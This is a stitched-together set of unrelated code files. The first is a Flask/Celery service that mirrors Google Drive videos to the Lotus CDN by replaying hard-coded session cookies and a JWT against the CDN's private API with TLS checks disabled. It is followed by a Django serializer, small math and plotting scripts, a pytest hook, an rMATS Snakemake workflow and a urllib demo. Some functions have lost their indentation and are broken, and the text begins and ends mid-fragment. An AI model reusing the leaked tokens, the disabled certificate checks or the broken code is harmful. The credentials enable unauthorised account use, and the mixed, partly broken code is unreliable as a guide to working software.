9GxujwUZ_CMDUIjWspozPS3uNdL-EL6YiF9p5P7QkvXVht0NbkzrXq; _lt_sd=PwdfIiFSBSsbFh4VKQk8UDlRRGtFKFElQD8FWRM/PBEYWxxzS0RXJlgECgtnbHATeBYTIgIUaTldUlFbcWJiBWQCX2JXVAZgDkFYQXN0fhMnURUiDglYOV1SUVsjMGICZgJTYgYHAGlfFAlMdW4zBTUDAjdRVwcxXEZcQHVmYgFkBVFjAgcGZQhHXB1nKw==; __admUTMtime=1598859448; 
_kh_t_e_a_s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYXRld2F5MSIsImF1ZCI6WyJ3ZWJraW5naHViIiwid2Via2luZ2h1YiJdLCJyb2xlIjoibWVtYmVyIiwiZXhwIjoxNTk4ODYwMDczLCJpYXQiOiIyMDIwLTA4LTMxIDE0OjM3In0.glZaFd_fcxlRQKPNt4EvewRhyfInMgHxYksy2BAtaGM"}
response = requests.get("https://lotus.vn/w/a/gtk",headers=header)
metadata = response.json()["data"]
auth_key = getAuthentication(response.headers["set-cookie"])
metadata["auth_key"] = auth_key
#print(metadata)
return metadata
def getAuthUserInfo(auth_key,sessionid,user_id):
    """Fetch the authenticated user's profile from the kinghub API."""
    header={"Authorization":"Bearer "+auth_key,"session-id":sessionid}
    # NOTE(review): verify=False disables TLS certificate checking -- confirm
    # this is intentional before shipping.
    response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-user/get-auth-userinfo?user_id="+user_id,headers=header,verify=False)
    data = response.json()
    return data
def getAuthentication(cookie):
    """Extract the first cookie's value from a Set-Cookie header string
    (the substring between the first '=' and the first ';')."""
    start = cookie.find("=") + 1
    stop = cookie.find(";")
    return cookie[start:stop]
def getToken(auth_key,sessionid,user_id):
    """Exchange the auth key/session for a social API access token."""
    header={"Authorization":"Bearer "+auth_key,"session-id":sessionid}
    # NOTE(review): verify=False disables TLS certificate checking.
    response = requests.post("https://webpub.lotuscdn.vn/api/social/token",headers=header,data={"userId":user_id},verify=False)
    data = response.json()
    print(data)  # debug trace of the token response
    return data
def kinghubPolicy(auth_key,api_key,sessionid,filename):
    """Request an upload policy (encoded policy + signature) for `filename`."""
    header={"Authorization":"Bearer "+auth_key,"session-id":sessionid,"API-Authorization":api_key}
    # NOTE(review): verify=False disables TLS certificate checking.
    response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-policy?filename="+filename+"&convert=true",headers=header,verify=False)
    data = response.json()
    print(data)  # debug trace of the policy response
    return data
def generateFilename(file):
    """Build a unique upload name of the form <epoch-millis>-<random>.mp4.

    Extension detection via `filetype` was intentionally disabled upstream;
    every upload is named as .mp4 regardless of the actual content of `file`.
    """
    millis = int(time.time() * 1000)
    suffix = get_random_string()
    return "%s-%s.mp4" % (millis, suffix)
def lotusAuth(filename):
    """Run the full auth chain (gtk -> user info -> token -> upload policy)
    and return everything uploadAPI/kinghubFileInfo need."""
    auth_key = gtk()["auth_key"]
    user_data = getUserInfo()
    sessionid = user_data["sessionid"]
    user_id = user_data["user_id"]
    api_key = getToken(auth_key,sessionid,user_id)["access_token"]
    print(filename)  # debug trace
    policy = kinghubPolicy(auth_key,api_key,sessionid,filename)["policy"]
    return {"policy":policy["encoded_policy"],"filename":filename,"signature":policy["signature"],"sessionid":sessionid,"api_key":api_key,"auth_key":auth_key}
def uploadAPI(filename,policy,signature,file):
    """Stream `file` to the Lotus CDN upload endpoint as multipart form data."""
    # NOTE(review): open(file,"rb") is never explicitly closed -- the encoder
    # streams from it, so it can only be closed after the request completes.
    data = MultipartEncoder({"filename":filename,"signature":signature,"filedata":(file,open(file,"rb"),"video/mp4"),"policy":policy})
    #postdata = {"filename":filename,"signature":signature,"filedata":open(file,"rb"),"policy":policy}
    # NOTE(review): Content-Length "0" alongside a streamed body looks wrong --
    # confirm the server ignores it.
    header = {"Content-Type":data.content_type,"Content-Length":"0","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
    response = requests.post("https://mps.lotuscdn.vn/_/upload",headers=header,data=data,verify=False)
    print(response.json())  # debug trace
    return response.json()
def kinghubFileInfo(filepath,api_key,auth_key,sessionid):
    """Query metadata for an uploaded file path on the kinghub API."""
    header={"Authorization":"Bearer "+auth_key,"session-id":sessionid,"API-Authorization":api_key}
    # NOTE(review): verify=False disables TLS certificate checking.
    response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-fileinfo?filename="+filepath,headers=header,verify=False)
    print(response.json())  # debug trace
    return response.json()
def get_random_string(length=10):
    """Return a random string of lowercase letters and digits.

    BUG FIX: this module never imports `string`, so every call raised a
    NameError; import it locally to keep the fix self-contained.
    """
    import string
    letters_and_digits = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters_and_digits) for i in range(length))
def upload(file):
    """Authenticate against Lotus and upload `file`.

    Returns the upload-response dict, or None on any failure (best-effort by
    design -- callers treat None as "upload failed").
    """
    try:
        filename = generateFilename(file)
        auth = lotusAuth(filename)
        upload_details = uploadAPI(auth["filename"], auth["policy"],
                                   auth["signature"], file)
        return upload_details
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; the None-on-failure contract is unchanged.
        return None
def fetchFileInfo(file_path):
    """Fetch CDN metadata for an already-uploaded file.

    Returns the kinghub file-info JSON dict, or None on any failure.
    """
    try:
        auth = lotusAuthFileInfo()
        return kinghubFileInfo(file_path, auth["api_key"],
                               auth["auth_key"], auth["sessionid"])
    except Exception:  # narrowed from a bare except
        return None
def lotusAuthFileInfo():
    """Build the credential triple (session id, API token, app key) needed
    for metadata lookups — same as lotusAuth() but without an upload policy."""
    app_key = gtk()["auth_key"]
    user = getUserInfo()
    session_id = user["sessionid"]
    token = getToken(app_key, session_id, user["user_id"])["access_token"]
    return {"sessionid": session_id, "api_key": token, "auth_key": app_key}
def getid(link):
id = link.replace("https://drive.google.com","").replace("/file/d/","").replace("open?id=","").replace("/view","").replace("/edit","").replace("?usp=sharing","")
return id
def create_credential():
    """Run the interactive OAuth flow and persist the credential file.

    Delegates to the project-local GoogleAuthV1 helper; imported lazily so
    the module still loads when only other auth paths are used.
    """
    from GoogleAuthV1 import auth_and_save_credential
    auth_and_save_credential()
# Authentication + token creation
def create_drive_manager():
gAuth = GoogleAuth()
typeOfAuth = None
if not path.exists("credentials.txt"):
typeOfAuth = input("type save if you want to keep a credential file, else type nothing")
bool = True if typeOfAuth == "save" or path.exists("credentials.txt") else False
authorize_from_credential(gAuth, bool)
drive: GoogleDrive = GoogleDrive(gAuth)
return drive
def authorize_from_credential(gAuth, isSaved):
    """Authorize `gAuth` either ad hoc (no file) or via a saved credentials.txt.

    NOTE(review): this copy of the file reached us without indentation, so
    the exact nesting below is a reconstruction — confirm against the repo.
    When isSaved and the file exists but was not just created, the expired
    branch presumably performs the load (access_token_expired is truthy
    before any credentials are loaded) — verify with the PyDrive docs.
    """
    if not isSaved:  # no credential.txt wanted
        from GoogleAuthV1 import auth_no_save
        auth_no_save(gAuth)
    if isSaved and not path.exists("credentials.txt"):
        # First run: create the credential file, then load it.
        create_credential()
        gAuth.LoadCredentialsFile("credentials.txt")
    if isSaved and gAuth.access_token_expired:
        # Reload and refresh a stale (or not-yet-loaded) saved credential.
        gAuth.LoadCredentialsFile("credentials.txt")
        gAuth.Refresh()
        print("token refreshed!")
        gAuth.SaveCredentialsFile("credentials.txt")
    gAuth.Authorize()
    print("authorized access to google drive API!")
def download(fileid):  # downloader
    """Download a Drive file into the working directory, retrying until the
    on-disk size matches the size Drive reports.

    Returns the local filename (== fileid) on success, None on error.

    NOTE(review): Drive metadata often reports `size` as a string while
    os.stat returns an int — confirm the comparison below ever matches.
    """
    while True:
        try:
            file = driver.CreateFile({"id": fileid})
            file.GetContentFile(fileid)
            if os.stat(fileid).st_size == file["size"]:
                return fileid
            # Size mismatch: drop the partial download and retry.
            if os.path.isfile(fileid):
                os.remove(fileid)
            continue
        except Exception:  # narrowed from a bare except
            if os.path.isfile(fileid):
                os.remove(fileid)
            return None
def MediaToBaseDownloader(fileid):
    """Chunked download of a Drive file via MediaIoBaseDownload.

    Writes to a local file named after the file id, printing progress as
    it goes. Returns the local filename on success, None on an HTTP error.
    """
    request = driver.auth.service.files().get_media(fileId=fileid)
    # `with` fixes the original's handle leak (local_fd was never closed);
    # the unused `driver.CreateFile(...)` object was dropped.
    with open(fileid, "wb") as local_fd:
        media_request = http.MediaIoBaseDownload(local_fd, request)
        while True:
            try:
                download_progress, done = media_request.next_chunk()
            except errors.HttpError as error:
                print('An error occurred: %s' % error)
                return None
            if download_progress:
                print('Download Progress: %d%%' % int(download_progress.progress() * 100))
            if done:
                print('Download Complete')
                return fileid
def generate(link):
if link == None:
return None
s = link.replace("https://drive.google.com","").replace("/file/d/","").replace("open?id=","").replace("/view","").replace("/edit","").replace("?usp=sharing","").replace(" ","").replace("\n","")
drive = s[::-1]
cdn = "https://lotus.animetvn.com/stream?id="+drive
return cdn+"\n"
main = Flask(__name__)  # Flask application instance
# NOTE(review): the assignments without a right-hand side below are broken
# in this copy of the file — the secret values (Mongo URI, Celery result
# backend, secret key) appear to have been redacted. Restore before running.
main.config["MONGO_URI"] =
main.config["CELERY_RESULT_BACKEND"] =
main.config["CELERY_BROKER_URL"] = "amqp://localhost//"
main.config["SECRET_KEY"] =
# Map HTTP verb names to the matching `requests` functions.
method_requests_mapping = {
    'GET': requests.get,
    'HEAD': requests.head,
    'POST': requests.post,
    'PUT': requests.put,
    'DELETE': requests.delete,
    'PATCH': requests.patch,
    'OPTIONS': requests.options,
}
# Service singletons: Celery worker, Mongo collections, Drive client.
celery = make_celery(main)
mongo = PyMongo()
mongo.init_app(main)
video_db = mongo.db.lotus
user_collection = mongo.db.users
driver = create_drive_manager()
def _abort_transfer(fileid):
    """Best-effort cleanup after a failed transfer: drop any partial local
    file and forget the pending DB record."""
    if os.path.isfile(fileid):
        os.remove(fileid)
    video_db.delete_one({"drive": fileid})


@celery.task(name="api")  # celery implementation for queueing
def celeryapi(fileid):
    """Background task: mirror a Drive file to Lotus CDN.

    Downloads the file, uploads it to Lotus, then records the upload
    details plus the Drive title and a timestamp on the video document.
    Returns "Done" on success, "Unsuccessful" otherwise.
    """
    try:
        # Renamed from `path`, which shadowed the module-level os.path alias.
        local_path = MediaToBaseDownloader(fileid)
        if local_path:
            lotus = upload(local_path)
            if lotus:
                os.remove(local_path)
                myquery = {"drive": str(fileid)}
                video_db.update_one(myquery, {"$set": lotus})
                file = driver.CreateFile({"id": fileid})
                video_db.update_one(
                    myquery,
                    {"$set": {"title": file["title"], "ts": str(time.time())}},
                )
                return "Done"
        # Download or upload failed: clean up and report failure.
        _abort_transfer(fileid)
        return "Unsuccessful"
    except Exception:  # narrowed from a bare except
        _abort_transfer(fileid)
        return "Unsuccessful"
@main.route("/api")  # main engine
def lotus():
    """API endpoint: queue a Drive file for mirroring and report status.

    Query params: drive (Drive share link or bare id), key (client key).
    Responds with a JSON status plus the public embed URL; 404 JSON when
    no args are given or the insert fails.
    """
    video_db = mongo.db.lotus
    user_collection = mongo.db.users
    if not request.args:
        return json.dumps({"status": "unavailable"}), 404
    args = request.args
    # Reuse getid() instead of duplicating its replace chain inline.
    fileid = getid(args.get("drive"))
    key = args.get("key")
    check = video_db.find_one({"drive": str(fileid)})
    if check:
        encrypt = str(check["_id"])
        # `payload` renamed from `dict`, which shadowed the builtin.
        if 'info' in check.keys() or "file_path" in check.keys():
            payload = {"status": "done", "embed": "https://lotus.animetvn.com/?id=" + str(encrypt)}
        else:
            payload = {"status": "processing", "embed": "https://lotus.animetvn.com/?id=" + str(encrypt)}
        return json.dumps(payload)
    try:
        video_db.insert_one({'drive': str(fileid), "key": key})
        encrypt = video_db.find_one({"drive": str(fileid)})["_id"]
        celeryapi.delay(fileid)
        payload = {"status": "processing", "embed": "https://lotus.animetvn.com/?id=" + str(encrypt)}
        return json.dumps(payload)
    except Exception:  # narrowed from a bare except
        return json.dumps({"status": "unavailable"}), 404
@main.route("/")
def stream():
    """Player page: render the HTML5 player for a mirrored video.

    Query params: id (Mongo ObjectId of the video document), hls
    (optional; force the HLS master playlist for "info"-style records).

    NOTE(review): this copy of the file lost its indentation — the nesting
    below is a reconstruction; confirm against the repo.
    """
    video_db = mongo.db.lotus
    if request.args:
        args = request.args
        drive = args.get("id")
        query = video_db.find_one({"_id": ObjectId(drive)})
        if query:
            # Records with an "info" sub-document carry full CDN paths.
            if "info" in query.keys():
                if args.get("hls"):
                    return render_template("lotus.html", playlist=query["info"]["full_path"] + "/master.m3u8", thumbnail=query["info"]["thumbnail"], title=query["title"])
                return render_template("lotus.html", playlist=query["info"]["full_path"], thumbnail=query["info"]["thumbnail"], title=query["title"])
            # Older records only store a relative "file_path" on the CDN host.
            if "file_path" in query.keys():
                if "ts" in query.keys():
                    # Presumably the CDN finishes HLS transcoding within an
                    # hour of upload; serve the playlist after that window.
                    if (float(query["ts"]) + float(3600)) < time.time():
                        return render_template("lotus.html", playlist="https://web.lotuscdn.vn" + query["file_path"] + "/master.m3u8", title=query["title"])
                    else:
                        return render_template("lotus.html", playlist="https://web.lotuscdn.vn" + query["file_path"], title=query["title"])
                else:
                    return render_template("lotus.html", playlist="https://web.lotuscdn.vn" + query["file_path"] + "/master.m3u8", title=query["title"])
            else:
                return json.dumps({"status": "processing"})
        else:
            return json.dumps({"status": "unavailable"}), 404
    else:
        return json.dumps({"status": "unavailable"}), 404
@main.route("/metadata")
def info():
    """Metadata endpoint: proxy Lotus/kinghub file info for one video.

    Query param: id (Mongo ObjectId of the video document).
    Returns the kinghub JSON, a "processing" status while no CDN path is
    recorded yet, or a 404 JSON when unknown / no args.
    """
    video_db = mongo.db.lotus
    if request.args:
        args = request.args
        drive = args.get("id")
        query = video_db.find_one({"_id": ObjectId(drive)})
        if query:
            if "info" in query.keys():
                return json.dumps(fetchFileInfo(query["info"]["file_path"]))
            if "file_path" in query.keys():
                return json.dumps(fetchFileInfo(query["file_path"]))
            else:
                return json.dumps({"status": "processing"})
        else:
            return json.dumps({"status": "unavailable"}), 404
    else:
        return json.dumps({"status": "unavailable"}), 404
@main.route("/<path:path>")
def files(path):
    """Serve static assets from the application directory.

    Flask's send_from_directory rejects paths escaping the base directory,
    so this is not a raw path-traversal hole — but it does expose every
    file in "./", including this source file; consider narrowing.
    """
    return send_from_directory("./", path)
def download_file(streamable):
    """Yield the body of a streamed response in ~100 KB chunks.

    Raises for non-2xx statuses and closes the response (via the context
    manager) once iteration finishes.
    """
    with streamable as stream:
        stream.raise_for_status()
        yield from stream.iter_content(chunk_size=100000)
def _proxy(request, requestsurl):
    """Replay an incoming Flask request against `requestsurl` and stream
    the upstream answer back, preserving status code and headers (the
    Host header is dropped; redirects are not followed)."""
    forwarded_headers = {k: v for (k, v) in request.headers if k != 'Host'}
    upstream = requests.request(
        method=request.method,
        url=requestsurl,
        headers=forwarded_headers,
        data=request.get_data(),
        cookies=request.cookies,
        allow_redirects=False,
        stream=True,
    )
    header_pairs = [(name, value) for (name, value) in upstream.raw.headers.items()]
    return Response(download_file(upstream), upstream.status_code, header_pairs)
# Dev entry point: Flask's debug server on port 8000 (not for production).
if __name__ == "__main__":
    main.run(debug=True, port=8000)
|
from apps.team.models import Team, UserTeamAssignment
from rest_framework import serializers
from api.api_auth.serializers import UserSerializer
class UserTeamAssignment(serializers.ModelSerializer):
    """Serializer for a user's membership in a team.

    NOTE(review): this class reuses the *model's* name, shadowing
    `apps.team.models.UserTeamAssignment` at module scope after this
    definition. `Meta.model` below still binds to the model because the
    class name is not yet bound while the class body executes — but the
    shadowing is fragile; consider renaming to UserTeamAssignmentSerializer
    (callers would need updating, so not changed here).
    """
    # Nested representation of the assigned user.
    user = UserSerializer()

    class Meta:
        model = UserTeamAssignment
        # Hide the surrogate key and the back-reference to the team.
        exclude = ['id', 'team']
class TeamSerializer(serializers.ModelSerializer):
    """Serializer for Team: all model fields plus a computed `members`
    list of serialized user-team assignments."""
    members = serializers.SerializerMethodField()

    class Meta:
        model = Team
        fields = "__all__"

    def get_members(self, obj):
        # Serialize every assignment attached to this team. Note that
        # `UserTeamAssignment` here resolves to the *serializer* class of
        # that name (it shadows the model at module scope).
        utas = obj.userteamassignment_set.all()
        serializer_data = UserTeamAssignment(utas, many=True).data
        return serializer_data
|
def es_primo(num):
    """Return True when `num` is prime.

    Fixes the original, which reported 0, 1 and negatives as prime, and
    trial-divides only up to sqrt(num) instead of num - 1. Behavior for
    the script's inputs (num >= 2) is unchanged.
    """
    if num < 2:
        return False
    for divisor in range(2, int(num ** 0.5) + 1):
        if num % divisor == 0:
            return False
    return True
# Read how many primes to emit, then print them as fractions whose
# orientation alternates: a/p, p/a, a/p, ... where p runs over the primes
# and `a` grows by consecutive increments (2, 3, 4, ...) after every
# second prime.
# NOTE(review): this copy lost its indentation — the nesting below is a
# reconstruction; confirm against the original.
n = int(input())
i = 0        # primes printed so far
sw = True    # True -> print a/prime, False -> print prime/a
j = 2        # candidate number being tested for primality
a = 1        # the counterpart numerator/denominator
cntS = 2     # next increment applied to `a`
while i < n:
    if es_primo(j):
        if sw:
            print(a, '/', j, sep='')
            sw = False
        else:
            print(j, '/', a, sep='')
            sw = True
            a = a + cntS
            cntS = cntS + 1
        i = i + 1
    j = j + 1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import py
# Directory holding tests that use async/await syntax.
ASYNC_DIR = py.path.local(os.path.abspath(__file__)).dirpath("async")


def pytest_ignore_collect(path, config):
    """Pytest hook: skip collecting the async test directory on Python < 3.6,
    where the syntax used there would be a SyntaxError.

    Returning True ignores the path; falling through returns None, which
    lets other hooks (and default collection) decide.
    """
    # Ignore async tests if not supported.
    if sys.version_info < (3, 6) and path.common(ASYNC_DIR) == ASYNC_DIR:
        return True
|
"""
Student ID: 2594 4800
Name: JiaHui (Jeffrey) Lu
Aug-2017
"""
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(-10, 10, 0.01)
y = x * (1 + np.power(np.tan(x), 2)) / np.tan(x)
y1 = np.tan(x)
plt.subplot(1, 2, 1)
plot1, = plt.plot(x, y, label="condition")
plot2, = plt.plot(x, y1, "g", label="function")
plt.title("f(x) = tan(x)")
plt.legend(handles=[plot1, plot2], loc=1)
plt.ylim((-100, 100))
plt.subplot(1, 2, 2)
z = x / ((1 + np.power(x, 2)) * np.arctan(x))
z1 = np.arctan(x)
plot3, = plt.plot(x, z, label="condition")
plot4, = plt.plot(x, z1, "g", label="function")
plt.legend(handles=[plot3, plot4], loc=1)
plt.title("f(x) = arctan(x)")
plt.show()
"""
The green plot shows the function value and the blue plot shows the condition number.
As you can see, the condition number for arctan(x) behaves much nicer (much better conditioned) than tan(x)
""" |
"""Methods and constants for creating animations"""
# Standard Library
from typing import List
from random import choice, sample
# Third party
import gif
import numpy as np
import plotly.graph_objects as go
# TODO: add more colors
# Two-color palettes used as heatmap colorscales; one pair is picked at
# random per animation and its order is shuffled (see make_animation).
COLORS = [("#155b92", "#15925e"),
          ("#9b76bc", "#618da7"),
          ("#ffba08", "#ff8c61"),
          ("#ffba08", "#43aa8b"),
          ("#ff928b", "#b392ac"),
          ("#00d59e", "#ab63fa")]
@gif.frame
def animation_frame(fig: go.Figure) -> go.Figure:
    """Identity wrapper: @gif.frame captures the returned figure as one
    animation frame."""
    return fig
def make_plot(state: np.ndarray, colors: List[str]) -> go.Figure:
    """Render a 2-D state array as a bare heatmap: no axes, no colorbar,
    no margins, sized at 10 px per cell."""
    n_rows, n_cols = state.shape
    figure = go.Figure(go.Heatmap(z=state, colorscale=colors))
    figure.update_traces(showscale=False)
    figure.update_layout(
        width=10 * n_cols,
        height=10 * n_rows,
        xaxis_visible=False,
        yaxis_visible=False,
        margin=dict(t=0, b=0, l=0, r=0),
    )
    return figure
def make_animation(states: List[np.ndarray], filename: str):
    """Write `states` out as a GIF at 75 ms per frame.

    A two-color palette is drawn at random (and randomly ordered) from
    COLORS; the frame count is appended to the output filename.
    """
    print("animating...")
    palette = sample(choice(COLORS), k=2)
    frames = [animation_frame(make_plot(state, palette)) for state in states]
    out_name = f"{filename}_{len(frames)}_frames.gif"
    gif.save(frames, out_name, duration=75)
|
# -*- coding: utf-8
"""
Created on 17:07 27/07/2018
Snakemake workflow for rMATS
If you use rMATs, please cite
Shen, Shihao, et al. "rMATS: robust and flexible detection of differential
alternative splicing from replicate RNA-Seq data." Proceedings of the
National Academy of Sciences 111.51 (2014): E5593-E5601.
"""
__author__ = "Thiago Britto Borges"
__copyright__ = "Copyright 2021, Dieterichlab"
__email__ = "Thiago.BrittoBorges@uni-heidelberg.de"
__license__ = "MIT"
import os
import tempfile
from collections import defaultdict
# Run every job inside the pinned rMATS container image.
container: "docker://tbrittoborges/rmats:latest"

# Work relative to the configured project path (default: cwd).
workdir: config.get("path", ".")

contrasts = config["contrasts"]

# Sample names look like "<group>_<replicate>"; split into tuples.
keys = config["samples"].keys()
keys = [tuple(x.split("_")) for x in keys]

# Scratch space for rMATS temporary output (removed on interpreter exit).
temp_dir = tempfile.TemporaryDirectory()

# Map each group name to its list of replicate ids.
d = defaultdict(list)
for x in keys:
    d[x[0]].append(x[1])
include: "symlink.smk"

# Input-list creation is trivial; run it locally, not on the cluster.
# NOTE(review): localrules names `create_rmats_input` but the rule further
# down is declared `rmats_create_input` — confirm which name is intended.
localrules:
    create_rmats_input,

# Final targets: one BAM-list per group, one result dir per contrast.
# NOTE(review): contrast names are presumably formatted "<alt>-vs-<ref>"
# to match the rmats_run output pattern — verify the config.
rule all:
    input:
        expand("rmats/{group}.txt", group=d.keys()),
        expand("rmats/{contrast}/", contrast=contrasts),
# Write the comma-separated BAM list rMATS expects for one sample group.
rule rmats_create_input:
    input:
        lambda wc: expand("mappings/{{group}}_{rep}.bam", rep=d.get(wc.group)),
    log:
        "logs/rmats/create_input_{group}.log",
    output:
        "rmats/{group}.txt",
    run:
        with open(str(output), "w") as fou:
            fou.write(",".join(input))
# Differential alternative splicing between an "alt" and a "ref" group.
rule rmats_run:
    input:
        alt="rmats/{alt}.txt",
        ref="rmats/{ref}.txt",
    output:
        directory("rmats/{alt}-vs-{ref}/"),
    # Isolated working copy so rMATS scratch files don't collide.
    shadow:
        "shallow"
    log:
        "logs/rmats/run_{alt}-vs-{ref}.log",
    threads: 10
    params:
        gtf=config["ref"],
        is_paired="single" if config.get("is_single_end") else "paired",
        lib=config.get("strandness", "fr-unstranded"),
        read_len=config["read_len"],
        # The three flags below default to ON; set the config key to "" to disable.
        allow_clipping=config.get("rmats_allow_clipping", "--allow-clipping"),
        variable_read_length=config.get(
            "rmats_variable_read_length", "--variable-read-length"
        ),
        novel_ss=config.get("rmats_novel_ss", "--novelSS"),
        extra=config.get("rmats_extra", ""),
        # Per-contrast scratch dir inside the TemporaryDirectory above.
        tmp=os.path.join(temp_dir.name, "{alt}_vs_{ref}/"),
    shell:
        "rmats.py "
        "--b1 {input.alt} "
        "--b2 {input.ref} "
        "--gtf {params.gtf} "
        "--readLength {params.read_len} "
        "--nthread {threads} "
        "-t {params.is_paired} "
        "--libType {params.lib} "
        "{params.novel_ss} "
        "{params.allow_clipping} "
        "{params.variable_read_length} "
        "--od {output} "
        "--tmp {params.tmp} "
        "{params.extra}"
|
"""
created by ldolin
"""
import urllib.request
# https://httpbin.org/get 测试请求头
url = 'http://httpbin.org/get'
# response = urllib.request.urlopen(url)
# text = response.read().decode('utf-8')
# print(text)
# {
# "args": {},
# "headers": {
# "Accept-Encoding": "identity",
# "Host": "httpbin.org",
# "User-Agent": "Python-urllib/3.7"
# },
# "origin": "111.47.249.64, 111.47.249.64",
# "url": "https://httpbin.org/get"
# }
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
request = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(request)
text = response.read().decode('utf-8')
print(text)
# {
# "args": {},
# "headers": {
# "Accept-Encoding": "identity",
# "Host": "httpbin.org",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
# },
# "origin": "111.47.249.64, 111.47.249.64",
# "url": "https://httpbin.org/get"
# }
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.